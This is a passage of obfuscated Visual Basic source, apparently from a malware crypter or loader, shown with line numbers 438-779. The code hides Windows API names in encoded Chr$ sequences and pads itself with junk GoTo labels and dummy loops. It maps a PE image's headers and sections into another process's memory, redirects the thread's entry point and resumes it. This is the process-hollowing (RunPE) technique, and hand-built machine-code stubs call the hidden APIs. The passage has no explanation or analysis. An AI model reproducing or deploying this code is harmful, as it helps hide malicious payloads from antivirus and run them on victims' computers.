  438. lbiJtN9fS = Jun1VG4mO(SmLB8PCzU, BEWRmY2Bl(Chr$(196) & Chr$(108) & Chr$(123) & Chr$(48) & Chr$(211) & Chr$(225) _
  439.  & Chr$(112) & Chr$(84) & Chr$(107) & Chr$(103) & Chr$(117) & Chr$(77) & Chr$(100) & Chr$(81) & Chr$(103) _
  440.  & Chr$(97) & Chr$(118) & Chr$(107) & Chr$(109) & Chr$(108), Chr$(119) & Chr$(55) & Chr$(79) & Chr$(53) _
  441.  & Chr$(86) & Chr$(49) & Chr$(110) & Chr$(112) & Chr$(76) & Chr$(110)))
  442. GoTo n8T5U1hEDeMdPTtUfZro
  443. n8T5U1hEDeMdPTtUfZro:
  444.         WotN7p9P5 lbiJtN9fS, ZbXogQyas.hProcess, OqXXVZ4wM.OptionalHeader.ImageBase
  445. GoTo L5G8t1WlHuEbWACiCIQF
  446. L5G8t1WlHuEbWACiCIQF:
  447. lbiJtN9fS = Jun1VG4mO(Fdquendve, BEWRmY2Bl(Chr$(72) & Chr$(87) & Chr$(12) & Chr$(116) & Chr$(119) & Chr$(99) _
  448.  & Chr$(110) & Chr$(67) & Chr$(110) & Chr$(110) & Chr$(109) & Chr$(97) & Chr$(71) & Chr$(122), Chr$(114) _
  449.  & Chr$(49) & Chr$(67) & Chr$(54) & Chr$(89) & Chr$(52) & Chr$(73) & Chr$(85) & Chr$(118) & Chr$(81) _
  450. ))
  451. GoTo k8u8w3biNaZptynNcUFm
  452. k8u8w3biNaZptynNcUFm:
  453.         WotN7p9P5 lbiJtN9fS, ZbXogQyas.hProcess, OqXXVZ4wM.OptionalHeader.ImageBase, OqXXVZ4wM.OptionalHeader.SizeOfImage, XVLAKkD0I Or trEVgUtTi, gvoghHKD0
  454. GoTo o1l7E0jvWWwHTuPtSkKk
  455. o1l7E0jvWWwHTuPtSkKk:
  456. lbiJtN9fS = Jun1VG4mO(Fdquendve, BEWRmY2Bl(Chr$(223) & Chr$(98) & Chr$(119) & Chr$(74) & Chr$(27) & Chr$(80) _
  457.  & Chr$(112) & Chr$(109) & Chr$(97) & Chr$(103) & Chr$(113) & Chr$(113) & Chr$(79) & Chr$(103) & Chr$(111) _
  458.  & Chr$(109) & Chr$(112) & Chr$(123), Chr$(121) & Chr$(51) & Chr$(108) & Chr$(50) & Chr$(108) & Chr$(56) _
  459.  & Chr$(113) & Chr$(74) & Chr$(114) & Chr$(80)))
  460. GoTo U2g2m4gmitLahjsQLoqX
  461. U2g2m4gmitLahjsQLoqX:
  462.         WotN7p9P5 lbiJtN9fS, ZbXogQyas.hProcess, OqXXVZ4wM.OptionalHeader.ImageBase, VarPtr(p8rpyUDyf(0)), OqXXVZ4wM.OptionalHeader.SizeOfHeaders, 0
  463. GoTo d8F8Z3VUYKQXoPOeUXPn
  464. d8F8Z3VUYKQXoPOeUXPn:
  465.         For mpWCXcoZN = 0 To OqXXVZ4wM.FileHeader.NumberOfSections - 1
  466. GoTo R8t5Q6aRfpYYLMmyIjEi
  467. R8t5Q6aRfpYYLMmyIjEi:
  468.             wO9vsZUxD Lcfn7JQoZ, p8rpyUDyf(nfjrysVgu.e_lfanew + r9prn87An + KE3evtxdC * mpWCXcoZN), Len(Lcfn7JQoZ)
  469. GoTo H4k4W3ifDmvDLbcwAJgO
  470. H4k4W3ifDmvDLbcwAJgO:
  471.             WotN7p9P5 lbiJtN9fS, ZbXogQyas.hProcess, OqXXVZ4wM.OptionalHeader.ImageBase + Lcfn7JQoZ.VirtuaC6t0R7rHvArQtYWEsNEu, VarPtr(p8rpyUDyf(Lcfn7JQoZ.PointerToRawData)), Lcfn7JQoZ.SizeOfRawData, 0
  472. GoTo q1n8N3KpllkpaTaFfRhk
  473. q1n8N3KpllkpaTaFfRhk:
  474.         Next mpWCXcoZN
  475. GoTo n5E6M8rgBriyGoocOpMY
  476. n5E6M8rgBriyGoocOpMY:
  477.         I683ZWZB9.ContextFlags = gm3lvp9zz
  478. GoTo m3l4b0pmgyToNTPbesOQ
  479. m3l4b0pmgyToNTPbesOQ:
  480. lbiJtN9fS = Jun1VG4mO(SmLB8PCzU, BEWRmY2Bl(Chr$(56) & Chr$(154) & Chr$(167) & Chr$(165) & Chr$(244) & Chr$(67) _
  481.  & Chr$(109) & Chr$(108) & Chr$(118) & Chr$(103) & Chr$(122) & Chr$(118) & Chr$(86) & Chr$(106) & Chr$(112) _
  482.  & Chr$(103) & Chr$(99) & Chr$(102), Chr$(74) & Chr$(50) & Chr$(76) & Chr$(52) & Chr$(110) & Chr$(48) _
  483.  & Chr$(75) & Chr$(77) & Chr$(86) & Chr$(115)))
  484. GoTo w1D5y2iCylRaaZePIPtH
  485. w1D5y2iCylRaaZePIPtH:
  486.         WotN7p9P5 lbiJtN9fS, ZbXogQyas.hThread, VarPtr(I683ZWZB9)
  487. GoTo G4Z5U8IBkTVpSXkuQdRD
  488. G4Z5U8IBkTVpSXkuQdRD:
  489. lbiJtN9fS = Jun1VG4mO(Fdquendve, BEWRmY2Bl(Chr$(223) & Chr$(98) & Chr$(119) & Chr$(74) & Chr$(27) & Chr$(80) _
  490.  & Chr$(112) & Chr$(109) & Chr$(97) & Chr$(103) & Chr$(113) & Chr$(113) & Chr$(79) & Chr$(103) & Chr$(111) _
  491.  & Chr$(109) & Chr$(112) & Chr$(123), Chr$(121) & Chr$(51) & Chr$(108) & Chr$(50) & Chr$(108) & Chr$(56) _
  492.  & Chr$(113) & Chr$(74) & Chr$(114) & Chr$(80)))
  493. GoTo e0A5J4MQqQbVnlIdCuqC
  494. e0A5J4MQqQbVnlIdCuqC:
  495.         WotN7p9P5 lbiJtN9fS, ZbXogQyas.hProcess, I683ZWZB9.Ebx + 8, VarPtr(OqXXVZ4wM.OptionalHeader.ImageBase), 4, 0
  496. GoTo T6D7B4TvweEMChqrpuSY
  497. T6D7B4TvweEMChqrpuSY:
  498.         I683ZWZB9.Eax = OqXXVZ4wM.OptionalHeader.ImageBase + OqXXVZ4wM.OptionalHeader.AddressOfEntryPoint
  499. GoTo f2X4m7skJYRCjlGinBwg
  500. f2X4m7skJYRCjlGinBwg:
  501. lbiJtN9fS = Jun1VG4mO(SmLB8PCzU, BEWRmY2Bl(Chr$(94) & Chr$(106) & Chr$(109) & Chr$(27) & Chr$(116) & Chr$(65) _
  502.  & Chr$(109) & Chr$(108) & Chr$(118) & Chr$(103) & Chr$(122) & Chr$(118) & Chr$(86) & Chr$(106) & Chr$(112) _
  503.  & Chr$(103) & Chr$(99) & Chr$(102), Chr$(110) & Chr$(51) & Chr$(84) & Chr$(48) & Chr$(71) & Chr$(52) _
  504.  & Chr$(104) & Chr$(88) & Chr$(68) & Chr$(119)))
  505. GoTo t3T8D3rMqPgHhsmFnKtF
  506. t3T8D3rMqPgHhsmFnKtF:
  507.         WotN7p9P5 lbiJtN9fS, ZbXogQyas.hThread, VarPtr(I683ZWZB9)
  508. GoTo L1S6G1RojNPyCVdSwttr
  509. L1S6G1RojNPyCVdSwttr:
  510. lbiJtN9fS = Jun1VG4mO(SmLB8PCzU, BEWRmY2Bl(Chr$(84) & Chr$(66) & Chr$(60) & Chr$(187) & Chr$(179) & Chr$(245) _
  511.  & Chr$(109) & Chr$(103) & Chr$(86) & Chr$(106) & Chr$(112) & Chr$(103) & Chr$(99) & Chr$(102), Chr$(119) _
  512.  & Chr$(56) & Chr$(67) & Chr$(54) & Chr$(116) & Chr$(48) & Chr$(82) & Chr$(114) & Chr$(114) & Chr$(72) _
  513. ))
  514. GoTo V1N3l2LbRULkNsqYNhXO
  515. V1N3l2LbRULkNsqYNhXO:
  516.         WotN7p9P5 lbiJtN9fS, ZbXogQyas.hThread, 0
  517. GoTo c6V3I1jrFgBfEVhWTNfc
  518. c6V3I1jrFgBfEVhWTNfc:
  519.  
  520. GoTo i8A8H4ZuvGdKnEkqKSHm
  521. i8A8H4ZuvGdKnEkqKSHm:
  522.     G8MvJAjoU = True
  523. GoTo i6h6X3XCcOdhkcBeJsod
  524. i6h6X3XCcOdhkcBeJsod:
  525. End Function
  526.  
  527. Public Function WotN7p9P5(ByVal lbiJtN9fS As Long, ParamArray NWSHJItlN()) As Long
  528. GoTo w7e8D6lYLmJVjRiUYwmj
  529. w7e8D6lYLmJVjRiUYwmj:
  530.     Dim WJNVbo1RR        As Long
  531. GoTo d8s3l2QMYbpLNWgbEUmH
  532. d8s3l2QMYbpLNWgbEUmH:
  533.     Dim mpWCXcoZN1           As Long
  534. GoTo L1u4j6inYSZDQPfjmdDS
  535. L1u4j6inYSZDQPfjmdDS:
  536.     Dim rVNSHowuN       As String
  537. GoTo L8c5A5guFZnaNnKJlSkW
  538. L8c5A5guFZnaNnKJlSkW:
  539.     Dim iPOiVx95j     As String
  540.     Dim a0a6f8uRnMEAMcrNBKhc As String, G1o1O4MrABEbipUggyAD As String, IZvCYHmm9() As String, V0Y7Q7CyOwUEPUQctIQR As String, a0s4Y1LemcIDECHrGWvv As Integer
  541.     a0a6f8uRnMEAMcrNBKhc = Chr$(50)
  542.     For a0s4Y1LemcIDECHrGWvv = 1 To Len(a0a6f8uRnMEAMcrNBKhc)
  543. G1o1O4MrABEbipUggyAD = G1o1O4MrABEbipUggyAD & IIf(a0s4Y1LemcIDECHrGWvv = 1, Asc(Mid$(a0a6f8uRnMEAMcrNBKhc, a0s4Y1LemcIDECHrGWvv, 1)), Chr$(124) _
  544.  & Asc(Mid$(a0a6f8uRnMEAMcrNBKhc, a0s4Y1LemcIDECHrGWvv, 1)))
  545.     Next a0s4Y1LemcIDECHrGWvv
  546.     IZvCYHmm9() = rZjOyBMBM(G1o1O4MrABEbipUggyAD, Chr$(124))
  547.     For a0s4Y1LemcIDECHrGWvv = 0 To UBound(IZvCYHmm9)
  548.     V0Y7Q7CyOwUEPUQctIQR = V0Y7Q7CyOwUEPUQctIQR & Chr(CLng(IZvCYHmm9(a0s4Y1LemcIDECHrGWvv)))
  549.     Next a0s4Y1LemcIDECHrGWvv
  550.     If V0Y7Q7CyOwUEPUQctIQR = Chr$(50) Then GoTo 2
  551. 2:
  552.     If lbiJtN9fS = 0 Then Exit Function
  553. GoTo D1v4d5JwSJANYHGttVdp
  554. D1v4d5JwSJANYHGttVdp:
  555.     For mpWCXcoZN1 = UBound(NWSHJItlN) To 0 Step -1
  556. GoTo S6R7H3HFROkUfkhsKLgh
  557. S6R7H3HFROkUfkhsKLgh:
  558. iPOiVx95j = iPOiVx95j & BEWRmY2Bl(Chr$(30) & Chr$(118), Chr$(105) & Chr$(54) & Chr$(100) & Chr$(48) & Chr$(102) _
  559.  & Chr$(49) & Chr$(73) & Chr$(112) & Chr$(101) & Chr$(111)) & gz1wjd6oD(CLng(NWSHJItlN(mpWCXcoZN1)))
  560. GoTo q2y4o4buDsYTUSXIBJmO
  561. q2y4o4buDsYTUSXIBJmO:
  562.     Next
  563. GoTo P3V2m2teaOiZQeoXWKvX
  564. P3V2m2teaOiZQeoXWKvX:
  565.     WJNVbo1RR = VarPtr(WfyxtT8nv(0))
  566. GoTo S5s4r5iIytnGDZyUZWhk
  567. S5s4r5iIytnGDZyUZWhk:
  568.     WJNVbo1RR = WJNVbo1RR + (UBound(NWSHJItlN) + 2) * 5
  569. GoTo A3W5p6OdvQjeTIJHMvpw
  570. A3W5p6OdvQjeTIJHMvpw:
  571.     WJNVbo1RR = lbiJtN9fS - WJNVbo1RR - 5
  572. GoTo b7n0I2CbqiTBDYBFTdwM
  573. b7n0I2CbqiTBDYBFTdwM:
  574.     rVNSHowuN = Chr(56) + Chr(66) + Chr(52) + Chr(67) + Chr(50) + Chr(52) + Chr(48) + Chr(56) + Chr(53) + Chr(49) + Chr(60) + Chr(110) + Chr(53) + Chr(98) + Chr(48) + Chr(76) + Chr(52) + Chr(65) + Chr(84) + Chr(88) + Chr(111) + Chr(66) + Chr(111) + Chr(109) + Chr(103) + Chr(121) + Chr(83) + Chr(67) + Chr(78) + Chr(84) + Chr(80) + Chr(62) + Chr(69) + Chr(56) + Chr(60) + Chr(97) + Chr(55) + Chr(115) + Chr(50) + Chr(80) + Chr(52) + Chr(118) + Chr(100) + Chr(72) + Chr(87) + Chr(68) + Chr(75) + Chr(99) + Chr(107) + Chr(97) + Chr(71) + Chr(66) + Chr(67) + Chr(65) + Chr(70) + Chr(62) + Chr(53) + Chr(57) + Chr(56) + Chr(57) + Chr(48) + Chr(49) + Chr(54) + Chr(54) + Chr(51) + Chr(49) + Chr(67) + Chr(48) + Chr(67) + Chr(51)
  575. GoTo l2i6K7IuYKEWTpMkcYkB
  576. l2i6K7IuYKEWTpMkcYkB:
  577.     rVNSHowuN = Replace(rVNSHowuN, Chr(60) + Chr(110) + Chr(53) + Chr(98) + Chr(48) + Chr(76) + Chr(52) + Chr(65) + Chr(84) + Chr(88) + Chr(111) + Chr(66) + Chr(111) + Chr(109) + Chr(103) + Chr(121) + Chr(83) + Chr(67) + Chr(78) + Chr(84) + Chr(80) + Chr(62), iPOiVx95j)
  578. GoTo Q6Z6G0egNhmukQYZXcAH
  579. Q6Z6G0egNhmukQYZXcAH:
  580.     rVNSHowuN = Replace(rVNSHowuN, Chr(60) + Chr(97) + Chr(55) + Chr(115) + Chr(50) + Chr(80) + Chr(52) + Chr(118) + Chr(100) + Chr(72) + Chr(87) + Chr(68) + Chr(75) + Chr(99) + Chr(107) + Chr(97) + Chr(71) + Chr(66) + Chr(67) + Chr(65) + Chr(70) + Chr(62), gz1wjd6oD(WJNVbo1RR))
  581. GoTo O7F1U4bSrHAjRToRVjfO
  582. O7F1U4bSrHAjRToRVjfO:
  583.     Call adz4Yzz8T(rVNSHowuN)
  584. GoTo B4a0K4SwVnNnsLtRBLRN
  585. B4a0K4SwVnNnsLtRBLRN:
  586.     WotN7p9P5 = EGBVXhGj6
  587. GoTo Z7F2O4upTVCIbjZFAAEo
  588. Z7F2O4upTVCIbjZFAAEo:
  589. End Function
  590.  
  591. Private Function gz1wjd6oD(ByVal DA5oc0DwO As Long) As String
  592. GoTo y0T8s1CtSyaYGuPGvKUE
  593. y0T8s1CtSyaYGuPGvKUE:
  594.     Dim RJDqXoZGC(3)   As Byte
  595. GoTo D7q3a7PiOlEQECyOLhRb
  596. D7q3a7PiOlEQECyOLhRb:
  597.     Dim mpWCXcoZN2           As Long
  598.     Dim h5p1I5enLsWlSYrApVQR As String, P3F8F6KyMPSKjMqbWLfW As String, WegiI9bKW() As String, w3s8u1JYtuEOJmCVoIDr As String, X5h5k4OVANMcgiaAPHrZ As Integer
  599.     h5p1I5enLsWlSYrApVQR = Chr$(53)
  600.     For X5h5k4OVANMcgiaAPHrZ = 1 To Len(h5p1I5enLsWlSYrApVQR)
  601. P3F8F6KyMPSKjMqbWLfW = P3F8F6KyMPSKjMqbWLfW & IIf(X5h5k4OVANMcgiaAPHrZ = 1, Asc(Mid$(h5p1I5enLsWlSYrApVQR, X5h5k4OVANMcgiaAPHrZ, 1)), Chr$(124) _
  602.  & Asc(Mid$(h5p1I5enLsWlSYrApVQR, X5h5k4OVANMcgiaAPHrZ, 1)))
  603.     Next X5h5k4OVANMcgiaAPHrZ
  604.     WegiI9bKW() = rZjOyBMBM(P3F8F6KyMPSKjMqbWLfW, Chr$(124))
  605.     For X5h5k4OVANMcgiaAPHrZ = 0 To UBound(WegiI9bKW)
  606.     w3s8u1JYtuEOJmCVoIDr = w3s8u1JYtuEOJmCVoIDr & Chr(CLng(WegiI9bKW(X5h5k4OVANMcgiaAPHrZ)))
  607.     Next X5h5k4OVANMcgiaAPHrZ
  608.     If w3s8u1JYtuEOJmCVoIDr = Chr$(53) Then GoTo 5
  609. 5:
  610.     wO9vsZUxD RJDqXoZGC(0), DA5oc0DwO, &H4
  611. GoTo y4d7C4jXKkHGhPgTXvXi
  612. y4d7C4jXKkHGhPgTXvXi:
  613.     For mpWCXcoZN2 = 0 To 3
  614. GoTo B3Q6J6ZVhwNiWfDwbdKd
  615. B3Q6J6ZVhwNiWfDwbdKd:
  616. gz1wjd6oD = gz1wjd6oD & Right(BEWRmY2Bl(Chr$(2), Chr$(102) & Chr$(56) & Chr$(69) & Chr$(55) & Chr$(109) & Chr$(52) _
  617.  & Chr$(90) & Chr$(66) & Chr$(75) & Chr$(87)) & Hex(RJDqXoZGC(mpWCXcoZN2)), 2)
  618. GoTo j7g2V4UZvDLoCBRVXPoE
  619. j7g2V4UZvDLoCBRVXPoE:
  620.     Next
  621. GoTo y5O3k2SgcLYwZiuXqVtM
  622. y5O3k2SgcLYwZiuXqVtM:
  623. End Function
  624.  
  625. Private Sub adz4Yzz8T(ByVal NpRjYCHBX As String)
  626. GoTo l2X3j3pZjplwOdkmyTOr
  627. l2X3j3pZjplwOdkmyTOr:
  628.     Dim mpWCXcoZN3   As Long
  629.     Dim t4g0I8dYYXcNUbrSRhXa As String, S7U0v5TneVisbbPPpLnH As String, ySEoQF8Ds() As String, j3u2q8QYOtoonsdWdIiU As String, k7q6H6PAujEulJsrfRsP As Integer
  630.     t4g0I8dYYXcNUbrSRhXa = Chr$(53)
  631.     For k7q6H6PAujEulJsrfRsP = 1 To Len(t4g0I8dYYXcNUbrSRhXa)
  632. S7U0v5TneVisbbPPpLnH = S7U0v5TneVisbbPPpLnH & IIf(k7q6H6PAujEulJsrfRsP = 1, Asc(Mid$(t4g0I8dYYXcNUbrSRhXa, k7q6H6PAujEulJsrfRsP, 1)), Chr$(124) _
  633.  & Asc(Mid$(t4g0I8dYYXcNUbrSRhXa, k7q6H6PAujEulJsrfRsP, 1)))
  634.     Next k7q6H6PAujEulJsrfRsP
  635.     ySEoQF8Ds() = rZjOyBMBM(S7U0v5TneVisbbPPpLnH, Chr$(124))
  636.     For k7q6H6PAujEulJsrfRsP = 0 To UBound(ySEoQF8Ds)
  637.     j3u2q8QYOtoonsdWdIiU = j3u2q8QYOtoonsdWdIiU & Chr(CLng(ySEoQF8Ds(k7q6H6PAujEulJsrfRsP)))
  638.     Next k7q6H6PAujEulJsrfRsP
  639.     If j3u2q8QYOtoonsdWdIiU = Chr$(53) Then GoTo 5
  640. 5:
  641.     For mpWCXcoZN3 = 0 To Len(NpRjYCHBX) - 1 Step 2
  642. GoTo p4o4e1sqkDAWrRWSehvS
  643. p4o4e1sqkDAWrRWSehvS:
  644. WfyxtT8nv((mpWCXcoZN3 / 2)) = CByte(BEWRmY2Bl(Chr$(28) & Chr$(30), Chr$(119) & Chr$(51) & Chr$(118) & Chr$(51) _
  645.  & Chr$(110) & Chr$(48) & Chr$(110) & Chr$(107) & Chr$(101) & Chr$(118)) & Mid$(NpRjYCHBX, mpWCXcoZN3 + 1, 2))
  646. GoTo F2Y3y2eSMChqqpufYfKX
  647. F2Y3y2eSMChqqpufYfKX:
  648.     Next
  649. GoTo W6p8k1YRBilGimBLgtgT
  650. W6p8k1YRBilGimBLgtgT:
  651. End Sub
  652.  
  653. Private Function EGBVXhGj6() As Long
  654.     Dim u3P7Z7cgHgrlEBYtSLHS As String, j8T1R7jNOuPUcSwHHGLh As String, b9fyjDLnV() As String, K6j2T5IbHfvXvICUEaKV As String, b4i0O4XhFAdeLSksiOJK As Integer
  655.     u3P7Z7cgHgrlEBYtSLHS = Chr$(49)
  656.     For b4i0O4XhFAdeLSksiOJK = 1 To Len(u3P7Z7cgHgrlEBYtSLHS)
  657. j8T1R7jNOuPUcSwHHGLh = j8T1R7jNOuPUcSwHHGLh & IIf(b4i0O4XhFAdeLSksiOJK = 1, Asc(Mid$(u3P7Z7cgHgrlEBYtSLHS, b4i0O4XhFAdeLSksiOJK, 1)), Chr$(124) _
  658.  & Asc(Mid$(u3P7Z7cgHgrlEBYtSLHS, b4i0O4XhFAdeLSksiOJK, 1)))
  659.     Next b4i0O4XhFAdeLSksiOJK
  660.     b9fyjDLnV() = rZjOyBMBM(j8T1R7jNOuPUcSwHHGLh, Chr$(124))
  661.     For b4i0O4XhFAdeLSksiOJK = 0 To UBound(b9fyjDLnV)
  662.     K6j2T5IbHfvXvICUEaKV = K6j2T5IbHfvXvICUEaKV & Chr(CLng(b9fyjDLnV(b4i0O4XhFAdeLSksiOJK)))
  663.     Next b4i0O4XhFAdeLSksiOJK
  664.     If K6j2T5IbHfvXvICUEaKV = Chr$(49) Then GoTo 1
  665. 1:
  666.     wO9vsZUxD Qnrmt0tMW, ByVal ObjPtr(Me), &H4
  667. GoTo N0F2d0DTJMDcFkiQFZPG
  668. N0F2d0DTJMDcFkiQFZPG:
  669.     Qnrmt0tMW = Qnrmt0tMW + &H1C
  670. GoTo U5N2A0bjvYsXyNZOLFXU
  671. U5N2A0bjvYsXyNZOLFXU:
  672.     wO9vsZUxD mfM6R8zDQ, ByVal Qnrmt0tMW, &H4
  673. GoTo q4l7n0QRmowVCfyciCKe
  674. q4l7n0QRmowVCfyciCKe:
  675.     wO9vsZUxD ByVal Qnrmt0tMW, VarPtr(WfyxtT8nv(0)), &H4
  676. GoTo w0v0n5nSsetwBrRtZJFt
  677. w0v0n5nSsetwBrRtZJFt:
  678.     EGBVXhGj6 = JJAcJc0Fl
  679. GoTo O1u1T0CobDYlAhkoODAt
  680. O1u1T0CobDYlAhkoODAt:
  681.     wO9vsZUxD ByVal Qnrmt0tMW, mfM6R8zDQ, &H4
  682. GoTo M1g0a5cnrGbdmvqUkDXq
  683. M1g0a5cnrGbdmvqUkDXq:
  684. End Function
  685.  
  686. Public Function tRFzAcypS(ByVal Wcziyzybv As String, ByVal mMetdZkd5 As String) As Long
  687.     Dim j6u3c7YfwGybWXVaMFMp As String, R0S4Z3pSwhdRmcThraaN As String, VgOntxdI8() As String, Q5A0L3PsJbyPJennlqcV As String, c1T3i6phGVOwfiDfjwId As Integer
  688.     j6u3c7YfwGybWXVaMFMp = Chr$(55)
  689.     For c1T3i6phGVOwfiDfjwId = 1 To Len(j6u3c7YfwGybWXVaMFMp)
  690. R0S4Z3pSwhdRmcThraaN = R0S4Z3pSwhdRmcThraaN & IIf(c1T3i6phGVOwfiDfjwId = 1, Asc(Mid$(j6u3c7YfwGybWXVaMFMp, c1T3i6phGVOwfiDfjwId, 1)), Chr$(124) _
  691.  & Asc(Mid$(j6u3c7YfwGybWXVaMFMp, c1T3i6phGVOwfiDfjwId, 1)))
  692.     Next c1T3i6phGVOwfiDfjwId
  693.     VgOntxdI8() = rZjOyBMBM(R0S4Z3pSwhdRmcThraaN, Chr$(124))
  694.     For c1T3i6phGVOwfiDfjwId = 0 To UBound(VgOntxdI8)
  695.     Q5A0L3PsJbyPJennlqcV = Q5A0L3PsJbyPJennlqcV & Chr(CLng(VgOntxdI8(c1T3i6phGVOwfiDfjwId)))
  696.     Next c1T3i6phGVOwfiDfjwId
  697.     If Q5A0L3PsJbyPJennlqcV = Chr$(55) Then GoTo 7
  698. 7:
  699.     tRFzAcypS = Me.Jun1VG4mO(Me.P4EYumIcN(Wcziyzybv), mMetdZkd5)
  700. GoTo d3r2M7WnZdDdoiBwVqPH
  701. d3r2M7WnZdDdoiBwVqPH:
  702. End Function
  703.  
  704. Public Function P4EYumIcN(ByVal Wcziyzybv As String) As Long
  705.     Dim E2g8Q0NlfJLrMRZPuEED As String, H5l8X6jADGwWleOyTyAO As String, Glb1zamKP() As String, S4U5v2TUdCvZbIOhpfLG As String, H1K8C1ZBAQGIAZCgeNBW As Integer
  706.     E2g8Q0NlfJLrMRZPuEED = Chr$(50)
  707.     For H1K8C1ZBAQGIAZCgeNBW = 1 To Len(E2g8Q0NlfJLrMRZPuEED)
  708. H5l8X6jADGwWleOyTyAO = H5l8X6jADGwWleOyTyAO & IIf(H1K8C1ZBAQGIAZCgeNBW = 1, Asc(Mid$(E2g8Q0NlfJLrMRZPuEED, H1K8C1ZBAQGIAZCgeNBW, 1)), Chr$(124) _
  709.  & Asc(Mid$(E2g8Q0NlfJLrMRZPuEED, H1K8C1ZBAQGIAZCgeNBW, 1)))
  710.     Next H1K8C1ZBAQGIAZCgeNBW
  711.     Glb1zamKP() = rZjOyBMBM(H5l8X6jADGwWleOyTyAO, Chr$(124))
  712.     For H1K8C1ZBAQGIAZCgeNBW = 0 To UBound(Glb1zamKP)
  713.     S4U5v2TUdCvZbIOhpfLG = S4U5v2TUdCvZbIOhpfLG & Chr(CLng(Glb1zamKP(H1K8C1ZBAQGIAZCgeNBW)))
  714.     Next H1K8C1ZBAQGIAZCgeNBW
  715.     If S4U5v2TUdCvZbIOhpfLG = Chr$(50) Then GoTo 2
  716. 2:
  717.     P4EYumIcN = WotN7p9P5(JsRxtDuqO, StrPtr(Wcziyzybv & vbNullChar))
  718. GoTo D3b2K8vYgtVoUsKWKICU
  719. D3b2K8vYgtVoUsKWKICU:
  720. End Function
  721.  
  722. Public Property Get Initialized() As Boolean
  723. GoTo R7X6o6yNOjkuScrYfwGy
  724. R7X6o6yNOjkuScrYfwGy:
  725.     Initialized = tiKQbrb34
  726. GoTo A8y8j5kOpaquvoOqVGCp
  727. A8y8j5kOpaquvoOqVGCp:
  728. End Property
  729.  
  730. Public Sub Class_Initialize()
  731.     Dim L0r1Q0lYVivdyhlLvqJG As String, c0X5Z6nDYZjsnRgAUmhX As String, BmuE10F6W() As String, H4E1W5CPCoPlkNuMwCbC As String, N1Z4s2nfbnFToclJEhjQ As Integer
  732.     L0r1Q0lYVivdyhlLvqJG = Chr$(54)
  733.     For N1Z4s2nfbnFToclJEhjQ = 1 To Len(L0r1Q0lYVivdyhlLvqJG)
  734. c0X5Z6nDYZjsnRgAUmhX = c0X5Z6nDYZjsnRgAUmhX & IIf(N1Z4s2nfbnFToclJEhjQ = 1, Asc(Mid$(L0r1Q0lYVivdyhlLvqJG, N1Z4s2nfbnFToclJEhjQ, 1)), Chr$(124) _
  735.  & Asc(Mid$(L0r1Q0lYVivdyhlLvqJG, N1Z4s2nfbnFToclJEhjQ, 1)))
  736.     Next N1Z4s2nfbnFToclJEhjQ
  737.     BmuE10F6W() = rZjOyBMBM(c0X5Z6nDYZjsnRgAUmhX, Chr$(124))
  738.     For N1Z4s2nfbnFToclJEhjQ = 0 To UBound(BmuE10F6W)
  739.     H4E1W5CPCoPlkNuMwCbC = H4E1W5CPCoPlkNuMwCbC & Chr(CLng(BmuE10F6W(N1Z4s2nfbnFToclJEhjQ)))
  740.     Next N1Z4s2nfbnFToclJEhjQ
  741.     If H4E1W5CPCoPlkNuMwCbC = Chr$(54) Then GoTo 6
  742. 6:
  743.     Call adz4Yzz8T(Chr(56) + Chr(66) + Chr(52) + Chr(67) + Chr(50) + Chr(52) + Chr(48) + Chr(56) + Chr(53) + Chr(54) + Chr(53) + Chr(53) + Chr(51) + Chr(49) + Chr(67) + Chr(48) + Chr(54) + Chr(52) + Chr(56) + Chr(66) + Chr(55) + Chr(48) + Chr(51) + Chr(48) + Chr(56) + Chr(66) + Chr(55) + Chr(54) + Chr(48) + Chr(67) + Chr(56) + Chr(66) + Chr(55) + Chr(54) + Chr(49) + Chr(67) + Chr(56) + Chr(66) + Chr(54) + Chr(69) + Chr(48) + Chr(56) + Chr(56) + Chr(66) + Chr(55) + Chr(69) + Chr(50) + Chr(48) + Chr(56) + Chr(66) + Chr(51) + Chr(54) + Chr(51) + Chr(56) + Chr(52) + Chr(55) + Chr(49) + Chr(56) + Chr(55) + Chr(53) + Chr(70) + Chr(51) + Chr(56) + Chr(48) + Chr(51) + Chr(70) + Chr(54) + Chr(66) + Chr(55) + Chr(52) + Chr(48) + Chr(55) + Chr(56) + Chr(48) + Chr(51) + Chr(70) + Chr(52) + Chr(66) + Chr(55) + Chr(52) + Chr(48) + Chr(50) + Chr(69) + Chr(66) + Chr(69) + Chr(55) + Chr(56) + Chr(57) + Chr(50) + Chr(57) + Chr(53) + Chr(68) + Chr(53) + Chr(69) + Chr(67) + Chr(51))
  744. GoTo p8n3c5afDKRyIIXbeWuK
  745. p8n3c5afDKRyIIXbeWuK:
  746.     awKHqa6ZF = EGBVXhGj6
  747. GoTo D6U4r3YmjSfFFgoBdvcA
  748. D6U4r3YmjSfFFgoBdvcA:
  749.     If Not awKHqa6ZF = 0 Then
  750. GoTo S7S5X7ZyfqysEVjrsCaU
  751. S7S5X7ZyfqysEVjrsCaU:
  752. JsRxtDuqO = Jun1VG4mO(awKHqa6ZF, BEWRmY2Bl(Chr$(240) & Chr$(23) & Chr$(143) & Chr$(132) & Chr$(140) & Chr$(233) _
  753.  & Chr$(98) & Chr$(112) & Chr$(99) & Chr$(112) & Chr$(123) & Chr$(85), Chr$(116) & Chr$(51) & Chr$(66) _
  754.  & Chr$(50) & Chr$(82) & Chr$(50) & Chr$(90) & Chr$(112) & Chr$(113) & Chr$(77)))
  755. GoTo j6S4r0pVQQPUFMTjKKZP
  756. j6S4r0pVQQPUFMTjKKZP:
  757.         If Not JsRxtDuqO = 0 Then
  758. GoTo S2i2q7WLfWNakUTHHiqD
  759. S2i2q7WLfWNakUTHHiqD:
  760.             tiKQbrb34 = True
  761. GoTo f0e0U5USMebwhswtGXYt
  762. f0e0U5USMebwhswtGXYt:
  763.         End If
  764. GoTo u1c1m0ioIQGlghfkVOVA
  765. u1c1m0ioIQGlghfkVOVA:
  766.     End If
  767. GoTo a2c5i4AcHrmbymdqCkjX
  768. a2c5i4AcHrmbymdqCkjX:
  769. End Sub
  770.  
  771. Public Function Jun1VG4mO(ByVal lbiJtN9fS As Long, ByVal mMetdZkd5 As String) As Long
  772. GoTo h1f7G7FquVJHBTQmIhmj
  773. h1f7G7FquVJHBTQmIhmj:
  774.     Dim nfjrysVgu       As ghFoWNBil
  775. GoTo u8N6j8DwbqKdvrgMVWUZ
  776. u8N6j8DwbqKdvrgMVWUZ:
  777.     Dim OqXXVZ4wM       As CbtBC4ekK
  778. GoTo K0K7C0RVXPoEygOQkNSf
  779. K0K7C0RVXPoEygOQkNSf:
